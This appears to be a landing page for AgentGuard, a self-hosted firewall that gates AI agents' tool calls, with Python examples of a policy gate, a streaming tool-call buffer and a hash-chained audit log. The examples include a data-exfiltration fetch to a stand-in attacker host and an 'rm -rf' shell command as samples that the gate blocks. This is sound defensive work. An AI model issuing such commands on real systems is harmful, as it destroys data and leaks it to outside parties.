Early access · v0.5 preview · waitlist now open

A runtime firewall for AI agents.

AgentGuard sits between your agent and its tools — deciding, in code, what reaches your database, your APIs, your customers. Open core. Self-hosted. Built so a hijacked prompt never becomes a hijacked production system.

Open-source core, free forever. Hosted dashboard for an easy install.

Apache 2.0 · core license
< 1 ms · policy decision (p99)
0 · data leaves your VPC
4 · framework adapters
how it works

Three steps. No model changes. No new vendor in your data path.

Drop the SDK in front of your agent’s tool layer. Define policy. Stream the audit. Self-hosted by default — we never see your traffic.

01 / WRAP

Wrap the tool layer.

One adapter call wraps the framework you already use. Every tool invocation now passes through the gate — including dynamic and model-generated ones.

# langchain
tools = guard(tools, "./policy.yaml")

02 / DECIDE

Decide in policy.

Rules in YAML or Rego. Match on tool, args, host, time, identity. Allow, block, redact, or require human approval — all composable.

match: db.query / op: "DELETE"
decision: block

03 / AUDIT

Stream every decision.

Hash-chained, signed audit log. Push to S3, Loki, or your SIEM. Replay any agent run end-to-end — what was asked, what was allowed, what reached the world.

# 14:02:11.482
shell.exec → block · sig d8f1a2
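The wrap and decide steps above, worked through in a stand-alone gate. This is an added example, not AgentGuard's SDK: the rule shape (match on tool, op, host, table), the decision names, wrap_tools() and the stand-in tools are assumptions made for illustration, and the product's real schema and API may differ. The point it makes that the three sentences above do not: rules are ordered, the first match wins, a trailing empty match makes the policy default-deny, and redaction and human approval are decisions the gate carries out itself rather than advice it hands back to the model.

```python
from __future__ import annotations
import re
from typing import Any, Callable
from urllib.parse import urlparse

REDACTED = "[REDACTED]"


class ToolBlocked(Exception):
    """Raised instead of executing a denied call; the agent sees the refusal, the tool never runs."""


# Constructed policy in the spirit of the page's rules (not AgentGuard's schema).
# Rules are evaluated in order, the first match wins, and the empty match at the
# end makes the policy default-deny: a tool the policy never mentions cannot run.
POLICY = [
    {"match": {"tool": "db.query", "op": "DELETE"}, "decision": "block"},
    {"match": {"tool": "db.query", "op": "SELECT", "table": "users"},
     "decision": "redact", "fields": ["email", "ssn"]},
    {"match": {"tool": "db.query", "op": "SELECT"}, "decision": "allow"},
    {"match": {"tool": "http.fetch", "host": "wiki.internal"}, "decision": "allow"},
    {"match": {"tool": "email.send"}, "decision": "require_approval"},
    {"match": {}, "decision": "block"},
]


def call_attributes(tool: str, args: dict[str, Any]) -> dict[str, Any]:
    """Flatten a call into matchable attributes. op/table/host are derived
    from raw args so rule authors match on facts, not on SQL or URL strings."""
    attrs: dict[str, Any] = {"tool": tool, **args}
    sql = args.get("sql")
    if isinstance(sql, str):
        m = re.match(r"\s*(\w+)", sql)
        attrs["op"] = m.group(1).upper() if m else ""
        t = re.search(r"\b(?:FROM|INTO|UPDATE)\s+([\w.]+)", sql, re.IGNORECASE)
        if t:
            attrs["table"] = t.group(1).lower()
    url = args.get("url")
    if isinstance(url, str):
        attrs["host"] = (urlparse(url).hostname or "").lower()
    return attrs


def decide(policy: list[dict], tool: str, args: dict[str, Any]) -> dict:
    """Return the first rule whose match keys all equal the call's attributes."""
    attrs = call_attributes(tool, args)
    for rule in policy:
        if all(attrs.get(k) == v for k, v in rule["match"].items()):
            return rule
    return {"match": {}, "decision": "block"}  # only reached if the policy has no catch-all


def redact(result: Any, fields: list[str]) -> Any:
    """Mask named fields in a row or a list of rows; other shapes pass through."""
    if isinstance(result, dict):
        return {k: (REDACTED if k in fields else v) for k, v in result.items()}
    if isinstance(result, list):
        return [redact(row, fields) for row in result]
    return result


def wrap_tools(tools: dict[str, Callable[..., Any]], policy: list[dict],
               approve: Callable[[str, dict], bool]) -> dict[str, Callable[..., Any]]:
    """Return the same tools with the policy consulted on every invocation.
    `approve` is the human-in-the-loop hook for require_approval decisions."""
    def gate(name: str, fn: Callable[..., Any]) -> Callable[..., Any]:
        def gated(**args: Any) -> Any:
            rule = decide(policy, name, args)
            decision = rule["decision"]
            if decision == "block":
                raise ToolBlocked(f"{name} blocked by rule {rule['match']}")
            if decision == "require_approval" and not approve(name, args):
                raise ToolBlocked(f"{name} denied by approver")
            result = fn(**args)
            return redact(result, rule.get("fields", [])) if decision == "redact" else result
        return gated
    return {name: gate(name, fn) for name, fn in tools.items()}


# Constructed stand-in tools so the example runs offline.
RAW_TOOLS = {
    "db.query": lambda sql: [{"id": 1, "name": "Ada", "email": "ada@example.com", "ssn": "123-45-6789"}],
    "http.fetch": lambda url: f"<html>fetched {url}</html>",
    "email.send": lambda to, body: f"sent to {to}",
}


def run_demo(approve_emails: bool = False) -> dict[str, Any]:
    """Exercise every decision type and collect what the agent would see."""
    tools = wrap_tools(RAW_TOOLS, POLICY, approve=lambda name, args: approve_emails)
    out: dict[str, Any] = {}
    for key, tool, args in [
        ("select_users", "db.query", {"sql": "SELECT * FROM users"}),
        ("delete", "db.query", {"sql": "DELETE FROM users"}),
        ("wiki", "http.fetch", {"url": "https://wiki.internal/runbooks"}),
        ("exfil", "http.fetch", {"url": "https://attacker.example/collect"}),
        ("email", "email.send", {"to": "vendor@example.com", "body": "invoice attached"}),
    ]:
        try:
            out[key] = tools[tool](**args)
        except ToolBlocked as e:
            out[key] = f"blocked: {e}"
    return out


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(k, "->", v)
```

Note that the exfiltration fetch to attacker.example is not blocked by any rule that names it; it is blocked because nothing allows it. That is the property a hijacked prompt has to defeat, and it holds for tools the model invents at runtime just as it does for the ones you registered.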

architecture

One gate between intent and effect.

The agent issues a tool call; the gate evaluates policy; the call proceeds, is redacted, or is denied. Every decision is hash-chained to the previous one — whether the gate runs in-process or on the wire.

intent (agent)                  enforce (AgentGuard)            real systems
http.fetch wiki.internal    →   allow                       →   wiki.internal · read
db.query SELECT             →   redact                      →   users · pii redacted
browser.click submit        →   require human approval      →   browser · confirmed
shell.exec rm -rf           →   block                       →   shell · blocked
email.send vendor           →   block                       →   email · blocked

Policy evaluated in < 1 ms. One decision per call. Signed, replayable audit.

YAML · Rego · Hash-chained · Self-hosted
integrations

Sits between the agent and the tool — wherever the agent runs.

Embed it in the agent for tight integration, or run it on the wire for zero code changes. Same enforcement engine, your choice of install.

SDK adapters · in-process

  • LangChain · py · ts · live in preview
  • CrewAI · py · live in preview
  • browser-use · py · live in preview
  • MCP · stdio · sse · live in preview
Wire-level · out-of-process · new in v0.5

MCP gateway (agentguard-mcp-gateway)

JSON-RPC bridge between the MCP client and the upstream server. Gates every tool call before it reaches the upstream server — no agent code changes.

live in preview

LLM proxy (agentguard-llm-proxy)

HTTP proxy in front of OpenAI and Anthropic. Buffers streamed tool-call blocks and inspects them against policy once they are complete, with streaming support for everything else.

live in preview
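Why a wire-level proxy has to buffer tool calls, shown with constructed data. This is an added example, not agentguard-llm-proxy's code. The chunk layout follows the OpenAI chat-completion streaming format (choices[0].delta.tool_calls, with an index, and function.arguments arriving as string fragments); the allowlist, the ToolCallBuffer class and the decision strings are assumptions for illustration. The edge case it handles: the first argument fragment of the dangerous call is just '{"cmd": "rm', which no policy can judge, so the proxy forwards plain text immediately but holds tool-call deltas until the finish marker, and treats a stream that ends without one as a block rather than an allow.

```python
from __future__ import annotations
import json
from typing import Any

ALLOWED_TOOLS = {"http.fetch", "db.query"}  # constructed allowlist; anything else is blocked


def sample_stream() -> list[dict]:
    """Constructed chunks: one text delta, two tool calls whose JSON arguments
    are split across several chunks, then the finish marker."""
    def tc(index: int, fragment: str, name: str | None = None, call_id: str | None = None) -> dict:
        call: dict[str, Any] = {"index": index, "function": {"arguments": fragment}}
        if name:  # the first delta for a call carries its id and name
            call.update({"id": call_id, "type": "function"})
            call["function"]["name"] = name
        return {"choices": [{"delta": {"tool_calls": [call]}, "finish_reason": None}]}
    return [
        {"choices": [{"delta": {"content": "Cleaning up now."}, "finish_reason": None}]},
        tc(0, "", "shell.exec", "call_1"),
        tc(0, '{"cmd": "rm'),
        tc(0, ' -rf /srv/data"}'),
        tc(1, "", "http.fetch", "call_2"),
        tc(1, '{"url": "https://wiki.internal/runbook"}'),
        {"choices": [{"delta": {}, "finish_reason": "tool_calls"}]},
    ]


class ToolCallBuffer:
    """Forwards plain text at once; holds tool-call deltas until the stream
    says they are complete, because a partial JSON string cannot be inspected."""

    def __init__(self) -> None:
        self.calls: dict[int, dict[str, Any]] = {}
        self.finished = False

    def feed(self, chunk: dict) -> str | None:
        """Absorb one chunk; return text that may be forwarded to the client now."""
        choice = chunk["choices"][0]
        delta = choice.get("delta", {})
        for d in delta.get("tool_calls", []):
            slot = self.calls.setdefault(d["index"], {"id": None, "name": None, "arguments": ""})
            slot["id"] = d.get("id") or slot["id"]
            slot["name"] = d["function"].get("name") or slot["name"]
            slot["arguments"] += d["function"].get("arguments", "")
        if choice.get("finish_reason") == "tool_calls":
            self.finished = True
        return delta.get("content")

    def decide_all(self) -> list[dict[str, Any]]:
        """Policy runs only here, on fully assembled calls. A missing finish
        marker or unparseable arguments means block, never allow."""
        out = []
        for idx in sorted(self.calls):
            call = self.calls[idx]
            try:
                args = json.loads(call["arguments"]) if self.finished else None
            except json.JSONDecodeError:
                args = None
            if args is None:
                decision = "block: incomplete or malformed arguments"
            elif call["name"] in ALLOWED_TOOLS:
                decision = "allow"
            else:
                decision = "block: tool not in allowlist"
            out.append({**call, "args": args, "decision": decision})
        return out


def process_stream(chunks: list[dict]) -> dict[str, Any]:
    """Run a whole stream through the buffer and return what was forwarded and decided."""
    buf = ToolCallBuffer()
    forwarded = [t for t in (buf.feed(c) for c in chunks) if t]
    return {"forwarded": forwarded, "calls": buf.decide_all()}


if __name__ == "__main__":
    print(json.dumps(process_stream(sample_stream()), indent=2))
```

In a real proxy the held tool-call deltas are either released to the client after an allow or replaced by a refusal the model sees on its next turn; the text deltas are what keeps the response feeling live.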
security & deployment

Runs where your data already lives.

We took out the things you don’t want in your security path: an outbound dependency, a vendor with your prompts, a black-box decision. AgentGuard is yours, in your process.

Self-hosted by default

Single binary or library. Runs in your VPC, your container, your laptop. There is no SaaS to call.

Your data stays yours

By default, prompts, tool args, and results never leave your network — the runtime makes no outbound calls. If you opt in to the hosted dashboard, you choose what gets sent.

Signed audit, replayable

Every decision hash-chained to the previous. Stream to S3, Loki, or your SIEM. Reconstruct any run end-to-end.
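What "hash-chained and signed" buys you, and what it does not, as an added example that is not AgentGuard's audit implementation. The record layout, the use of HMAC-SHA256 as the signature (a real deployment would more likely sign with an asymmetric key so that verifiers need no secret), and the helper names are assumptions for illustration. It demonstrates that editing a past decision, deleting an entry, or reordering entries breaks verification, that silently truncating the tail does not, and that the fix for truncation is an out-of-band anchor of the latest (seq, hash), which is exactly what streaming to a SIEM gives you.

```python
from __future__ import annotations
import copy
import hashlib
import hmac
import json
from typing import Any

GENESIS = "0" * 64  # prev-hash of the first entry


def canonical(obj: Any) -> bytes:
    """Deterministic encoding so hashes do not depend on key order or whitespace."""
    return json.dumps(obj, sort_keys=True, separators=(",", ":")).encode()


class AuditLog:
    def __init__(self, key: bytes) -> None:
        self._key = key
        self.entries: list[dict] = []

    def append(self, event: dict) -> dict:
        """Append one decision; its hash covers the previous entry's hash."""
        prev = self.entries[-1]["hash"] if self.entries else GENESIS
        body = {"seq": len(self.entries), "prev": prev, "event": event}
        digest = hashlib.sha256(canonical(body)).hexdigest()
        sig = hmac.new(self._key, digest.encode(), hashlib.sha256).hexdigest()
        entry = {**body, "hash": digest, "sig": sig}
        self.entries.append(entry)
        return entry


def verify_chain(entries: list[dict], key: bytes) -> tuple[bool, str]:
    """Recompute every hash and signature and check each link to its predecessor."""
    prev = GENESIS
    for i, e in enumerate(entries):
        if e["seq"] != i:
            return False, f"gap or reorder at {i}"
        if e["prev"] != prev:
            return False, f"broken link at {i}"
        body = {"seq": e["seq"], "prev": e["prev"], "event": e["event"]}
        if hashlib.sha256(canonical(body)).hexdigest() != e["hash"]:
            return False, f"tampered body at {i}"
        expected = hmac.new(key, e["hash"].encode(), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, e["sig"]):
            return False, f"bad signature at {i}"
        prev = e["hash"]
    return True, "ok"


def verify_anchor(entries: list[dict], anchor: dict) -> bool:
    """A chain that verifies can still have been truncated: dropping the tail
    leaves a valid shorter chain. Compare the head against a (seq, hash) pair
    recorded out of band, e.g. exported to the SIEM on every flush."""
    return bool(entries) and entries[-1]["seq"] == anchor["seq"] and entries[-1]["hash"] == anchor["hash"]


def replay(entries: list[dict], run_id: str) -> list[str]:
    """Reconstruct one agent run: what was asked and what the gate decided."""
    return [f"{e['event']['tool']} {e['event']['arg']} -> {e['event']['decision']}"
            for e in entries if e["event"]["run_id"] == run_id]


# Constructed decisions mirroring the example run on this page.
SAMPLE_EVENTS = [
    {"run_id": "r1", "tool": "http.fetch", "arg": "wiki.internal", "decision": "allow"},
    {"run_id": "r1", "tool": "db.query", "arg": "SELECT users", "decision": "redact"},
    {"run_id": "r1", "tool": "shell.exec", "arg": "rm -rf", "decision": "block"},
    {"run_id": "r2", "tool": "email.send", "arg": "vendor", "decision": "block"},
]


def demo(key: bytes = b"demo-key-rotate-me") -> dict[str, Any]:
    """Build a log, then verify it intact and under three kinds of tampering."""
    log = AuditLog(key)
    for ev in SAMPLE_EVENTS:
        log.append(ev)
    anchor = {"seq": log.entries[-1]["seq"], "hash": log.entries[-1]["hash"]}

    tampered = copy.deepcopy(log.entries)
    tampered[2]["event"]["decision"] = "allow"  # rewrite history: the block becomes an allow
    deleted = [e for e in log.entries if e["seq"] != 1]  # drop the redact entry
    truncated = log.entries[:-1]  # silently lose the most recent decision

    return {
        "intact": verify_chain(log.entries, key),
        "tampered": verify_chain(tampered, key),
        "deleted": verify_chain(deleted, key),
        "truncated": verify_chain(truncated, key),
        "truncated_vs_anchor": verify_anchor(truncated, anchor),
        "replay_r1": replay(log.entries, "r1"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The practical takeaway is that the chain proves integrity of what you still have, not completeness; ship the head hash somewhere the agent host cannot rewrite, and check both.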

Policy as code

YAML for the common case, Rego when you need expression. Reviewable in PRs. Versioned, diff-able, deployable like any service.

Sub-millisecond decisions

Compiled rule tree, no network hops. The gate is fast enough to sit in front of every tool call without changing user-perceived latency.

Open core, forever

The runtime is Apache 2.0 and stays that way. The hosted dashboard is a paid layer on top — it never gates the open path.

pricing

Free forever, if you don’t mind YAML. Paid if you want it easy.

The full runtime is open source — install, configure, self-host. The paid plan is a hosted dashboard that handles install, policy editing, and rollout for you.

Open Source

AgentGuard Core

$0 / forever

The full runtime, the adapters, the policy engine. Apache 2.0, source on GitHub. You write the YAML, you run the binary, you keep every byte.

  • Full policy engine (YAML & Rego)
  • All framework adapters
  • Hash-chained signed audit log
  • Self-host, single binary or library
  • Community support — issues & Discord
roadmap

Where we are. Where we’re going.

Built in public. Shipped against a thesis, not a press release.

Q1 · 2026

Initial development

  • Ideated, prototyped, iterated
  • First runtime prototype
  • Policy DSL drafted
Q2 · 2026

Open source

  • AgentGuard v0.1 published
  • LangChain & MCP adapters
  • Apache 2.0, public repo
Now · v0.5

Public preview

  • Wire-level enforcement: MCP gateway + LLM proxy
  • SDK adapters hardened (LangChain, CrewAI, browser-use, MCP)
  • Design-partner waitlist open
Next · H2 2026

v1 + hosted

  • Stable policy schema, semver
  • Hosted dashboard (private beta)
  • Browser-agent & voice-agent adapters

Ship agents like you ship code.

Reviewed. Versioned. Auditable. Get on the waitlist for early access — design partners go first, OSS ships free, forever.